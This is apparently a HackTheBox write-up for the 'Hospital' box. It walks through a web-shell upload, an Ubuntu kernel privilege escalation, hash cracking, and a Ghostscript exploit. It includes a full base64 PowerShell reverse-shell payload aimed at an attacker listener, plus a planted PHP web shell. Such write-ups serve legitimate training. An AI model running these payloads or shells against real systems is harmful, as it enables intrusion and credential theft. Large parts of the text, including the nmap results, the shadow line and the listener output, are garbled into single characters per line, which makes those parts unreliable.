Writeup of Hospital From HackTheBox
Published on: Thursday, Dec 19, 2024
For the initial port scan, I use the following nmap command:
nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189
And receive the following results:
P
2
5
8
1
1
3
4
4
4
5
6
1
2
2
2
2
3
3
3
5
6
6
6
6
6
6
6
8
9
O
2
3
8
3
3
8
_
4
_
_
_
_
4
6
9
3
_
8
1
1
1
1
2
_
2
_
3
_
9
_
_
0
4
4
4
4
6
6
0
3
R
/
s
/
/
5
9
9
s
S
N
N
3
t
s
N
N
s
h
h
5
4
3
6
s
S
N
N
0
0
0
0
7
6
s
S
N
N
6
s
S
N
N
8
s
N
N
8
h
h
5
0
0
0
0
1
3
8
8
T
t
s
t
t
/
/
/
s
u
o
o
/
l
s
o
o
s
t
t
/
/
/
/
s
u
o
o
1
3
5
7
9
8
s
u
o
o
9
s
u
o
o
9
s
o
o
5
t
t
9
4
6
7
9
5
6
0
9
c
h
2
2
c
c
t
t
t
l
b
t
t
t
s
h
l
t
t
l
t
t
t
t
t
t
l
b
t
t
/
/
/
/
/
/
l
b
t
t
/
l
b
t
t
/
l
t
t
/
t
t
/
/
/
/
/
/
/
/
/
p
-
5
5
p
p
c
c
c
-
j
c
-
t
-
-
p
p
c
c
c
c
-
j
t
t
t
t
t
t
-
j
t
-
j
t
-
t
p
p
t
t
t
t
t
t
t
t
t
h
6
6
p
p
p
c
e
v
v
p
a
t
c
v
v
d
-
-
p
p
p
p
c
e
v
v
c
c
c
c
c
c
c
e
v
v
c
c
e
v
v
c
c
v
v
c
-
-
c
c
c
c
c
c
c
c
c
o
e
c
a
a
l
p
e
a
a
a
s
t
e
c
a
a
p
p
p
p
p
p
e
c
a
a
p
e
c
a
a
p
e
a
a
p
s
t
p
p
p
p
p
p
p
p
p
s
e
9
r
t
l
l
p
/
r
l
l
t
e
i
r
t
l
l
r
t
l
l
r
t
l
l
r
l
l
e
i
S
o
t
1
6
o
o
o
o
o
t
i
i
o
n
1
t
i
i
e
r
t
o
o
o
o
t
i
i
o
o
o
o
o
o
t
i
i
o
t
i
i
o
t
i
i
o
r
t
o
o
o
o
o
o
o
c
o
T
p
k
:
:
p
p
p
p
p
:
A
d
d
p
:
.
:
d
d
:
v
l
p
p
p
p
:
A
d
d
p
p
p
p
p
p
:
A
d
d
p
:
A
d
d
p
:
d
d
p
v
l
p
p
p
p
p
p
p
l
p
A
e
e
4
c
e
e
e
e
e
l
e
1
e
e
e
e
e
e
l
e
e
e
e
e
e
l
e
l
e
e
e
e
e
e
e
e
e
e
e
o
e
T
n
y
b
1
n
n
n
n
n
S
t
b
a
n
S
b
a
T
r
:
n
n
n
n
S
t
b
a
n
n
n
n
n
n
S
t
b
a
n
S
t
b
a
n
S
b
a
n
r
:
n
n
n
n
n
n
n
s
n
E
:
:
:
u
e
e
f
u
e
f
L
-
u
e
e
f
u
e
e
f
u
e
e
f
u
e
f
-
e
4
d
b
r
f
t
b
f
t
S
h
H
b
r
f
t
b
r
f
t
b
r
f
t
b
f
t
h
N
d
b
c
j
n
o
e
j
o
e
e
o
j
n
o
e
j
n
o
e
j
n
o
e
j
o
e
e
o
S
s
:
:
d
k
m
n
l
e
a
r
r
s
e
r
r
r
a
s
m
k
n
l
e
a
r
r
m
m
m
m
v
l
e
a
r
r
g
e
a
r
r
m
e
r
r
h
a
t
m
m
n
m
m
m
m
h
m
E
s
3
d
o
e
s
e
d
c
t
e
:
s
c
e
:
a
d
p
i
p
c
d
c
t
e
:
s
s
s
s
m
d
c
t
e
:
l
c
t
e
:
s
c
e
:
t
d
s
s
c
s
s
s
s
t
c
R
h
a
8
m
r
r
t
a
t
i
:
l
t
:
n
e
i
c
a
a
a
t
i
:
m
r
r
r
r
a
t
i
:
o
t
i
:
-
t
:
t
e
F
r
r
a
r
r
r
r
t
-
V
:
:
a
b
p
b
p
:
v
/
:
d
r
t
r
s
c
p
:
v
q
p
p
p
d
p
:
v
b
:
v
w
:
p
r
o
p
p
c
p
p
p
p
p
n
I
6
9
i
e
c
i
e
2
2
h
2
2
o
:
a
o
s
n
s
e
2
2
?
c
c
c
p
e
2
2
a
e
2
2
b
2
2
:
u
c
c
n
c
c
c
c
-
m
C
d
7
n
r
o
c
0
0
t
c
0
0
m
l
s
w
_
s
c
0
0
?
c
0
0
l
c
0
0
t
c
0
0
n
_
p
f
E
:
:
o
s
o
N
2
2
t
o
0
1
n
A
o
d
h
l
o
N
2
2
o
N
2
2
c
o
N
2
2
-
o
2
2
M
d
h
r
1
2
s
-
m
a
3
8
p
m
9
9
e
p
W
f
5
t
?
m
a
3
8
m
a
3
8
a
m
a
3
8
s
m
3
4
i
t
o
8
0
-
s
m
m
-
-
m
-
-
s
a
e
t
?
t
m
m
-
-
m
m
-
-
t
m
m
-
-
e
m
-
-
c
t
x
:
:
s
s
o
e
0
0
o
1
1
s
c
b
-
p
o
e
0
0
o
e
0
0
L
o
e
0
0
r
o
0
0
r
p
y
6
9
e
n
n
:
9
9
n
1
1
h
m
d
n
:
9
9
n
:
9
9
D
n
:
9
9
v
n
9
3
o
6
5
c
N
-
-
N
-
-
d
e
a
s
N
-
-
N
-
-
A
N
-
-
e
N
-
-
s
:
:
a
D
0
0
a
1
0
o
/
i
?
a
D
0
0
a
D
0
0
P
a
D
0
0
r
a
0
0
o
6
e
m
N
6
6
m
0
8
e
2
l
m
N
6
6
m
N
6
6
s
m
N
6
6
m
5
6
f
9
7
e
S
T
T
e
T
T
s
.
e
S
T
T
e
S
T
T
s
e
S
T
T
e
T
T
t
:
:
=
:
1
1
=
2
2
4
:
=
:
1
1
=
:
1
1
l
=
:
1
1
=
1
1
-
3
0
D
D
0
0
l
3
3
n
.
:
D
D
0
0
D
D
0
0
?
D
D
0
0
D
8
8
H
9
1
C
C
:
:
o
:
:
o
5
C
C
:
:
C
C
:
:
C
C
:
:
C
:
:
T
V
O
:
:
S
M
M
M
M
,
4
4
A
c
4
4
t
6
W
M
,
4
4
M
M
M
M
,
4
4
,
4
4
M
.
3
3
M
T
M
M
M
M
M
M
M
.
E
p
f
5
i
i
i
i
i
9
9
p
a
8
8
e
i
9
9
i
i
i
i
9
9
9
9
i
h
9
9
i
P
i
i
i
i
i
i
i
N
R
e
7
f
m
c
c
c
c
D
:
:
a
l
:
:
r
(
l
c
D
:
:
c
c
c
c
D
:
:
D
:
:
c
o
:
:
c
A
c
c
c
c
c
c
c
E
S
n
:
:
p
r
r
r
r
N
0
0
c
h
4
4
e
W
c
r
N
0
0
r
r
r
r
N
0
0
N
0
0
r
s
3
3
r
P
r
r
r
r
r
r
r
T
I
S
a
2
l
o
o
o
o
S
3
3
h
o
7
7
p
i
o
o
S
3
3
o
o
o
o
S
3
3
S
3
3
o
p
4
4
o
I
o
o
o
o
o
o
o
O
S
a
0
e
s
s
s
s
:
e
s
r
n
m
s
:
s
s
s
s
:
:
s
i
s
s
s
s
s
s
s
s
M
N
H
:
:
o
o
o
o
D
t
e
6
e
o
D
o
o
o
o
D
D
o
t
2
o
o
o
o
o
o
o
e
7
a
D
f
f
f
f
C
h
s
4
f
C
f
f
f
f
C
C
f
a
f
.
f
f
f
f
f
f
f
s
9
4
2
N
t
t
t
t
.
t
e
)
t
t
.
t
t
t
t
.
.
t
l
t
0
t
t
t
t
t
t
t
s
.
:
:
S
h
t
n
o
h
h
h
.
a
0
b
4
W
W
W
W
o
p
t
O
W
o
W
W
W
W
o
o
T
h
H
W
W
W
W
W
W
W
g
p
3
3
P
i
i
i
i
s
d
p
H
i
s
i
i
i
i
s
s
e
t
T
i
i
i
i
i
i
i
e
1
:
:
l
n
n
n
n
p
t
e
o
n
p
n
n
n
n
p
p
r
b
T
n
n
n
n
n
n
n
1
6
u
d
d
d
d
i
2
i
n
s
d
i
d
d
d
d
i
i
m
P
d
d
d
d
d
d
d
F
U
6
1
s
o
o
o
o
t
.
m
S
p
o
t
o
o
o
o
t
t
i
A
o
o
o
o
o
o
o
r
b
:
:
w
w
w
w
a
4
e
S
i
w
a
w
w
w
w
a
a
n
P
w
w
w
w
w
w
w
a
u
0
c
s
s
s
s
l
.
L
t
s
l
s
s
s
s
l
l
a
I
s
s
s
s
s
s
s
m
n
a
b
.
5
/
a
.
.
.
l
i
t
:
:
K
R
n
A
h
6
1
l
R
h
R
R
R
A
h
h
h
R
R
R
R
R
R
R
n
u
a
c
e
P
e
c
t
.
P
t
P
P
P
c
t
t
S
t
P
P
P
P
P
P
P
g
a
a
r
C
t
t
b
1
W
C
b
C
C
C
t
b
b
e
t
C
C
C
C
C
C
C
1
b
b
i
(
.
e
i
r
p
u
(
(
e
i
v
W
1
b
v
v
d
b
E
E
r
o
e
i
t
m
v
e
i
v
u
C
D
o
s
n
a
e
c
2
e
n
D
2
s
-
D
6
P
i
r
D
e
.
r
t
S
5
s
i
4
H
l
i
s
0
u
A
5
(
s
r
)
P
H
r
H
8
)
1
s
n
e
/
T
e
(
T
.
9
e
c
O
8
T
c
S
T
5
)
r
t
p
.
P
t
S
P
v
o
e
0
o
D
(
e
r
n
.
1
r
P
1
U
r
y
S
2
.
y
/
.
b
S
8
0
U
0
u
t
L
L
L
P
n
i
D
/
D
n
t
m
A
1
A
P
u
e
P
.
P
)
:
1
L
(
.
(
i
2
D
1
D
n
0
o
t
o
u
2
m
m
x
3
a
P
a
;
-
i
H
i
1
n
P
n
p
1
:
/
:
r
-
8
o
1
h
.
h
t
9
o
0
o
o
s
.
s
c
0
p
2
p
o
4
i
8
i
l
:
t
)
t
4
a
a
2
0
l
l
.
:
.
.
0
0
h
h
)
2
t
t
Z
b
b
)
0
0
.
.
,
,
S
S
i
i
t
t
e
e
:
:
D
D
e
e
f
f
a
a
u
u
l
l
t
t
-
-
F
F
i
i
r
r
s
s
t
t
-
-
S
S
i
i
t
t
e
e
-
-
N
N
a
a
m
m
e
e
)
)
I start by checking the service on port 443 and discover an instance of Roundcube webmail, since there are no recent unauthenticated exploits for Roundcube I check the other services. On port 8080 I find a simple web app that allows me to create an account and to upload a file. I use the p0wny@shell:~# and try different file extensions. The upload succeeds with a .phar file extension. The uploaded file can be found in the /uploads/ directory.
Pwning the container
Using the shell I find out that I am in an Ubuntu container.
www-data@webserver:…/html/uploads uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
I try to exploit CVE-2021-3493 , which tends to work on most Ubuntu systems.
I upload the exploit and run it, It works but the webshell cannot handle it, so I use the webshell to run a reverse shell and use the exploit from there.
After running the exploit again and getting a root shell, I take a look at /etc/shadow and dump the password hash for drwilliams.
d
r
w
i
l
l
i
a
m
s
:
$
6
$
u
W
B
S
e
T
c
o
X
X
T
B
R
k
i
L
$
S
9
i
p
k
s
J
f
i
Z
u
O
4
b
F
I
6
I
9
w
/
i
I
t
u
5
.
O
h
o
z
3
d
A
B
e
F
6
Q
W
u
m
G
B
s
p
U
W
3
7
8
P
1
t
l
w
a
k
7
N
q
z
o
u
o
R
T
b
r
z
6
A
g
0
q
c
y
G
Q
x
W
1
9
2
y
/
:
1
9
6
1
2
:
0
:
9
9
9
9
9
:
7
:
:
:
I then use hashcat to crack the password.
hashcat -m 1800 pw.hash rockyou.txt --show
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#
User flag
Using the credentials drwilliams:qwe123!@# I log into Roundcube webmail.
I find a mail telling me to send a GhostScript file. So I look for recent GhostScript RCEs and find CVE-2023-36664
I use RevShells to generate a Base64 encoded PowerShell reverse shell and a add the code as the payload for the exploit generator.
python3 CVE_2023_36664_exploit.py -g -x eps -p "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMgAiACwAMQAyADMANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
I send the generated .eps file to Dr. Brown and wait for the reverse shell to connect back to my listener.
$
L
C
P
i
o
S
n
s
n
c
t
n
C
e
e
:
-
n
c
\
l
i
t
U
n
n
i
s
v
g
o
e
p
n
r
o
s
1
n
r
\
2
e
d
3
0
c
r
4
.
e
b
0
i
r
.
v
o
0
e
w
.
d
n
0
.
o
H
1
n
O
2
S
3
1
P
4
0
I
.
T
1
A
2
L
9
\
.
D
2
o
2
c
9
u
.
m
1
e
8
n
9
t
s
6
>
2
3
0
Now I can now use the reverse shell to navigate to the Desktop folder and obtain the user flag.
Administrator flag
I start by running winpeas and see that I have write access to C:\xampp , so check the folder and find out that this is where Roundcube is being hosted.
I put the p0wny@shell:~# from earlier in the htdocs folder (this time as a .php file) and access it via the browser.
Now I can use the shell to obtain the root flag from the Administrators desktop.